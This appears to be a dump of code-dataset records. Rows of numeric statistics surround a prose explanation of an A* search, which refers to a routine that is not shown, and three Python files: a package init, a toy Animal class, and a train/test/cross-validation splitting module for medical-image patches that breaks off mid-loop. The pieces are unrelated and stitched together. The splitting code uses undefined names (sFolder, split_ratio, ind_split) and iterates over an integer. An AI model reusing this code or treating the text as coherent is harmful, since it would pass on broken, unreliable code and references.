| 40.731481 | 104 | 0.586497 | 554 | 4,399 | 4.530686 | 0.16787 | 0.109562 | 0.059761 | 0.040637 | 0.875697 | 0.875697 | 0.875697 | 0.850996 | 0.850996 | 0.850996 | 0 | 0.005531 | 0.342351 | 4,399 | 107 | 105 | 41.11215 | 0.862081 | 0.132985 | 0 | 0.885714 | 0 | 0 | 0.003703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.028571 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
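The A* routine above maintains a frontier ordered by f = g + h. The toy version below shows the same loop compactly with `heapq`, using an insertion counter to break priority ties so heap entries never compare nodes directly (the list-based `PriorityQueue` entries above would fall back to comparing `SearchNode` objects on ties). The graph and heuristic values are made up for illustration.

```python
import heapq
from itertools import count

# Minimal A* on a toy graph, equivalent in spirit to a_star above.

def a_star_toy(graph, h, start, goal):
    """graph: {node: [(neighbor, weight), ...]}; h: {node: heuristic estimate}."""
    tie = count()  # tie-breaker so the heap never compares non-numeric payloads
    frontier = [(h[start], next(tie), start, [start], 0.0)]
    explored = set()
    while frontier:
        f, _, node, path, g = heapq.heappop(frontier)
        if node == goal:
            return path, g
        if node in explored:
            continue
        explored.add(node)
        for nbr, w in graph.get(node, []):
            if nbr not in explored:
                heapq.heappush(frontier, (g + w + h[nbr], next(tie), nbr, path + [nbr], g + w))
    return None

graph = {"A": [("B", 1), ("C", 4)], "B": [("C", 1), ("D", 5)], "C": [("D", 1)]}
h = {"A": 2, "B": 2, "C": 1, "D": 0}
```

On this graph the search prefers A→B→C→D (cost 3) over the shorter-looking A→C→D (cost 5), which is exactly the behavior the g + h ordering buys over plain greedy search.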
a1a4eef66984b24431489bb08121c8ea195d91e7 | 42 | py | Python | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | null | null | null | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | 1 | 2020-12-03T07:49:38.000Z | 2020-12-03T07:51:08.000Z | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | null | null | null | from . import convert
from . import write | 21 | 22 | 0.761905 | 6 | 42 | 5.333333 | 0.666667 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 42 | 2 | 23 | 21 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a1f6ec196cf78e8bb8b303749ff6aadae3b364bd | 242 | py | Python | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null |
class Animal:
def __init__(self, sound):
self.sound = sound
def sayit(self, count=4):
return (self.sound.capitalize() + "! ") * count
class Duck(Animal):
def __init__(self):
super().__init__("quack")
| 16.133333 | 55 | 0.582645 | 28 | 242 | 4.607143 | 0.5 | 0.209302 | 0.20155 | 0.263566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00565 | 0.268595 | 242 | 14 | 56 | 17.285714 | 0.723164 | 0 | 0 | 0 | 0 | 0 | 0.029289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.125 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
b8062e9f7c5698a152f95c7ec6362d49942acaf6 | 32,838 | py | Python | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 02 15:59:36 2017
@author: Sebastian Milde, Thomas Kuestner
"""
import math
import numpy as np
import h5py
import inspect
import dis
from sklearn.model_selection import KFold
import os
from GUI.PyQt.DLArt_GUI import dlart
import keras.backend as K
def expecting():
"""Return how many values the caller is expecting"""
f = inspect.currentframe()
f = f.f_back.f_back
c = f.f_code
i = f.f_lasti
bytecode = c.co_code
instruction = bytecode[i+3]
if instruction == dis.opmap['UNPACK_SEQUENCE']:
howmany = bytecode[i+4]
return howmany
elif instruction == dis.opmap['POP_TOP']:
return 0
return 1
def fSplitDataset(allPatches, allY, allPats, sSplitting, patchSize, patchOverlap, testTrainingDatasetRatio=0, validationTrainRatio=0, outPutPath=None, nfolds = 0, isRandomShuffle=True):
# TODO: adapt path
iReturn = expecting()
#iReturn = 1000
# 2D or 3D patching?
if len(patchSize) == 2:
#2D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (2, 0, 1))
elif len(patchSize) == 3:
#3D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
allPatches = np.transpose(allPatches, (3, 0, 1, 2))
if sSplitting == dlart.DeepLearningArtApp.SIMPLE_RANDOM_SAMPLE_SPLITTING:
# splitting
indexSlices = range(allPatches.shape[0])
if isRandomShuffle:
indexSlices = np.random.permutation(indexSlices)
if len(patchSize)==2:
#2D patching
allPatches = allPatches[indexSlices, :, :]
elif len(patchSize)==3:
#3D patching
allPatches = allPatches[indexSlices, :, :, :]
shapeAllY = allY.shape
if len(shapeAllY) > 1:
if allY.shape[0] == patchSize[0] and allY.shape[1] == patchSize[1]:
allY = np.transpose(allY, (2, 0, 1))
allY = allY[indexSlices]
#num of samples in test set and validation set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
numSamplesValidation = math.floor(validationTrainRatio*(numAllPatches-numSamplesTest))
if len(patchSize) == 2:
#2D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
X_train = allPatches[(numSamplesTest+numSamplesValidation):, :, :]
elif len(patchSize) == 3:
# 3D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
X_train = allPatches[(numSamplesTest + numSamplesValidation):, :, :, :]
y_test = allY[:numSamplesTest]
y_valid = allY[numSamplesTest:(numSamplesTest + numSamplesValidation)]
y_train = allY[(numSamplesTest + numSamplesValidation):]
# #random samples
# nPatches = allPatches.shape[0]
# dVal = math.floor(split_ratio * nPatches)
# rand_num = np.random.permutation(np.arange(nPatches))
# rand_num = rand_num[0:int(dVal)].astype(int)
# print(rand_num)
#
# #do splitting
# X_test = allPatches[rand_num, :, :]
# y_test = allY[rand_num]
# X_train = allPatches
# X_train = np.delete(X_train, rand_num, axis=0)
# y_train = allY
# y_train = np.delete(y_train, rand_num)
# print(X_train.shape)
# print(X_test.shape)
# print(y_train.shape)
# print(y_test.shape)
# #!!!! train dataset is not randomly shuffeled!!!
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(
patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
# if len(patchSize) == 2:
# # 2D patches are used
# if allPatches.shape[1] == patchSize[0] and allPatches.shape[2] == patchSize[1]:
# X_train = np.transpose(X_train, (1, 2, 0))
# X_valid = np.transpose(X_valid, (1, 2, 0))
# X_test = np.transpose(X_test, (1, 2, 0))
# elif len(patchSize) == 3:
# # 3D patches are used
# if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
# X_train = np.transpose(X_train, (1, 2, 3, 0))
# X_valid = np.transpose(X_valid, (1, 2, 3, 0))
# X_test = np.transpose(X_test, (1, 2, 3, 0))
return [X_train], [y_train], [X_valid], [y_valid], [X_test], [y_test] # embed in a 1-fold list
elif sSplitting == dlart.DeepLearningArtApp.CROSS_VALIDATION_SPLITTING:
# split into test/train sets
#shuffle
indexSlices = range(allPatches.shape[0])
indexSlices = np.random.permutation(indexSlices)
allPatches = allPatches[indexSlices, :, :]
allY = allY[indexSlices]
# num of samples in test set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
# subarrays as no-copy views (array slices)
xTest = allPatches[:numSamplesTest, :, :]
yTest = allY[:numSamplesTest]
xTrain = allPatches[numSamplesTest:, :, :]
yTrain = allY[numSamplesTest:]
# split training dataset into n folds
if nfolds == 0:
kf = KFold(n_splits=len(allPats))
else:
kf = KFold(n_splits=nfolds)
#ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(xTrain):
X_train, X_test = xTrain[train_index], xTrain[test_index]
y_train, y_test = yTrain[train_index], yTrain[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
#ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold, xTest, yTest
elif sSplitting == dlart.DeepLearningArtApp.PATIENT_CROSS_VALIDATION_SPLITTING:
unique_pats = len(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
elif sSplitting == "normal":
print("Done")
nPatches = allPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num = rand_num[0:int(dVal)].astype(int)
print(rand_num)
if len(patchSize) == 3:
X_test = allPatches[rand_num, :, :, :]
else:
X_test = allPatches[rand_num, :, :]
y_test = allY[rand_num]
X_train = allPatches
X_train = np.delete(X_train, rand_num, axis=0)
y_train = allY
y_train = np.delete(y_train, rand_num)
#print(X_train.shape)
#print(X_test.shape)
#print(y_train.shape)
#print(y_test.shape)
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
return [X_train], [y_train], [X_test], [y_test] # embed in a 1-fold list
elif sSplitting == "crossvalidation_data":
if nfolds == 0:
kf = KFold(n_splits=len(np.unique(allPats)))
else:
kf = KFold(n_splits=nfolds)
ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(allPatches):
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])+ '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
elif sSplitting == "crossvalidation_patient":
unique_pats = np.unique(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])+ '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
def fSplitSegmentationDataset(allPatches, allY, allSegmentationMasks, allPats, sSplitting, patchSize, patchOverlap, testTrainingDatasetRatio=0, validationTrainRatio=0, outPutPath=None, nfolds = 0, isRandomShuffle=True):
# TODO: adapt path
iReturn = expecting()
#iReturn = 1000
# 2D or 3D patching?
if len(patchSize) == 2:
#2D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (2, 0, 1))
allSegmentationMasks = np.transpose(allSegmentationMasks, (2, 0, 1))
elif len(patchSize) == 3:
#3D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
allPatches = np.transpose(allPatches, (3, 0, 1, 2))
allSegmentationMasks = np.transpose(allSegmentationMasks, (3, 0, 1, 2))
if sSplitting == dlart.DeepLearningArtApp.SIMPLE_RANDOM_SAMPLE_SPLITTING:
# splitting
indexSlices = range(allPatches.shape[0])
if isRandomShuffle:
indexSlices = np.random.permutation(indexSlices)
if len(patchSize)==2:
#2D patching
allPatches = allPatches[indexSlices, :, :]
allSegmentationMasks = allSegmentationMasks[indexSlices, :, :]
elif len(patchSize)==3:
#3D patching
allPatches = allPatches[indexSlices, :, :, :]
allSegmentationMasks = allSegmentationMasks[indexSlices, :, :, :]
shapeAllY = allY.shape
if len(shapeAllY) > 1:
if allY.shape[0] == patchSize[0] and allY.shape[1] == patchSize[1]:
allY = np.transpose(allY, (2, 0, 1))
allY = allY[indexSlices]
#num of samples in test set and validation set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
numSamplesValidation = math.floor(validationTrainRatio*(numAllPatches-numSamplesTest))
if len(patchSize) == 2:
#2D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :]
Y_segMasks_test = allSegmentationMasks[:numSamplesTest, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
Y_segMasks_valid = allSegmentationMasks[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
X_train = allPatches[(numSamplesTest+numSamplesValidation):, :, :]
Y_segMasks_train = allSegmentationMasks[(numSamplesTest+numSamplesValidation):, :, :]
elif len(patchSize) == 3:
# 3D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :, :]
Y_segMasks_test = allSegmentationMasks[:numSamplesTest, :, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
Y_segMasks_valid = allSegmentationMasks[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
X_train = allPatches[(numSamplesTest + numSamplesValidation):, :, :, :]
Y_segMasks_train = allSegmentationMasks[(numSamplesTest + numSamplesValidation):, :, :, :]
y_test = allY[:numSamplesTest]
y_valid = allY[numSamplesTest:(numSamplesTest + numSamplesValidation)]
y_train = allY[(numSamplesTest + numSamplesValidation):]
# #random samples
# nPatches = allPatches.shape[0]
# dVal = math.floor(split_ratio * nPatches)
# rand_num = np.random.permutation(np.arange(nPatches))
# rand_num = rand_num[0:int(dVal)].astype(int)
# print(rand_num)
#
# #do splitting
# X_test = allPatches[rand_num, :, :]
# y_test = allY[rand_num]
# X_train = allPatches
# X_train = np.delete(X_train, rand_num, axis=0)
# y_train = allY
# y_train = np.delete(y_train, rand_num)
# print(X_train.shape)
# print(X_test.shape)
# print(y_train.shape)
# print(y_test.shape)
# #!!!! train dataset is not randomly shuffeled!!!
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(
patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
# if len(patchSize) == 2:
# # 2D patches are used
# if allPatches.shape[1] == patchSize[0] and allPatches.shape[2] == patchSize[1]:
# X_train = np.transpose(X_train, (1, 2, 0))
# X_valid = np.transpose(X_valid, (1, 2, 0))
# X_test = np.transpose(X_test, (1, 2, 0))
# elif len(patchSize) == 3:
# # 3D patches are used
# if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
# X_train = np.transpose(X_train, (1, 2, 3, 0))
# X_valid = np.transpose(X_valid, (1, 2, 3, 0))
# X_test = np.transpose(X_test, (1, 2, 3, 0))
return [X_train], [y_train], [Y_segMasks_train], [X_valid], [y_valid], [Y_segMasks_valid], [X_test], [y_test], [Y_segMasks_test] # embed in a 1-fold list
elif sSplitting == dlart.DeepLearningArtApp.CROSS_VALIDATION_SPLITTING:
# split into test/train sets
#shuffle
indexSlices = range(allPatches.shape[0])
indexSlices = np.random.permutation(indexSlices)
allPatches = allPatches[indexSlices, :, :]
allY = allY[indexSlices]
# num of samples in test set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
# subarrays as no-copy views (array slices)
xTest = allPatches[:numSamplesTest, :, :]
yTest = allY[:numSamplesTest]
xTrain = allPatches[numSamplesTest:, :, :]
yTrain = allY[numSamplesTest:]
# split training dataset into n folds
if nfolds == 0:
kf = KFold(n_splits=len(allPats))
else:
kf = KFold(n_splits=nfolds)
#ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(xTrain):
X_train, X_test = xTrain[train_index], xTrain[test_index]
y_train, y_test = yTrain[train_index], yTrain[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
#ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold, xTest, yTest
elif sSplitting == dlart.DeepLearningArtApp.PATIENT_CROSS_VALIDATION_SPLITTING:
unique_pats = len(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
def fSplitDatasetCorrection(sSplitting, dRefPatches, dArtPatches, allPats, split_ratio, nfolds, test_index):
"""
Split dataset with three options:
1. normal: randomly split data according to the split_ratio without cross validation
2. crossvalidation_data: perform crossvalidation with mixed patient data
3. crossvalidation_patient: perform crossvalidation with separate patient data
@param sSplitting: splitting mode 'normal', 'crossvalidation_data' or 'crossvalidation_patient'
@param dRefPatches: reference patches
@param dArtPatches: artifact patches
@param allPats: patient index
@param split_ratio: the ratio to split test data
@param nfolds: folds for cross validation
@return: testing and training data for both reference and artifact images
"""
train_ref_fold = []
test_ref_fold = []
train_art_fold = []
test_art_fold = []
# normal splitting
if sSplitting == 'normal':
nPatches = dRefPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num = rand_num[0:int(dVal)].astype(int)
test_ref_fold.append(dRefPatches[rand_num, :, :])
train_ref_fold.append(np.delete(dRefPatches, rand_num, axis=0))
test_art_fold.append(dArtPatches[rand_num, :, :])
train_art_fold.append(np.delete(dArtPatches, rand_num, axis=0))
# crossvalidation with mixed patient
if sSplitting == "crossvalidation_data":
if nfolds == 0:
kf = KFold(n_splits=len(np.unique(allPats)))
else:
kf = KFold(n_splits=nfolds)
for train_index, test_index in kf.split(dRefPatches):
